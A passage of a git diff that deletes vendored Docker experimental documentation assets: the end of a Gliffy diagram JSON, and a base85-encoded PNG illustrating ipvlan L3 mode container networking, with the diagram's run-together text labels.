Rotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-191.0,222.06704711914062],[-80.9272967534639,222.06704711914062]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":167.0,"y":25.499999999999986,"rotation":0.0,"id":323,"width":135.0,"height":32.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":51,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Physical Network

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"layers":[{"guid":"9wom3rMkTrb3","order":0,"name":"Layer 0","active":true,"locked":false,"visible":true,"nodeIndex":53}],"shapeStyles":{},"lineStyles":{"global":{"fill":"none","stroke":"#434343","strokeWidth":2,"dashStyle":"4.0,4.0","startArrow":2,"endArrow":2,"orthoMode":2}},"textStyles":{"global":{"face":"Arial","size":"13px","color":"#000000"}}},"metadata":{"title":"untitled","revision":0,"exportBorder":false,"loadPosition":"default","libraries":["com.gliffy.libraries.basic.basic_v1.default","com.gliffy.libraries.flowchart.flowchart_v1.default","com.gliffy.libraries.swimlanes.swimlanes_v1.default","com.gliffy.libraries.images","com.gliffy.libraries.network.network_v4.home","com.gliffy.libraries.network.network_v4.business","com.gliffy.libraries.network.network_v4.rack","com.gliffy.libraries.network.network_v3.home","com.gliffy.libraries.network.network_v3.business","com.gliffy.libraries.network.network_v3.rack"],"lastSerialized":1458117032939,"analyticsProduct":"Confluence"},"embeddedResources":{"index":0,"resources":[]}} \ No newline at end of file diff --git a/vendor/github.com/docker/docker/experimental/images/ipvlan-l3.png b/vendor/github.com/docker/docker/experimental/images/ipvlan-l3.png deleted file mode 100644 index 3227a83ca1541ec68e06b0aa105e22fdf5ae9e6f..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 18260 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,thephysicalnetworkdoesnothavearoutetotheirsubnetsWhohas10.16.20.0/24?Whohas10.1.20.0/24?ContainerscanbeondifferentsubnetsandreacheachotherIpvlanL3ModeEth0192.168.50.10/24ParentinterfaceactsasaRouterAllcontainerscanpingeachotherarouterifwithouttheysharetheparentinterface (sameexampleeth0)Container(s)Eth010.1.20.x/24Container(s)Eth0172.16.20.x/24PhysicalNetwork \ No newline at end of file diff --git 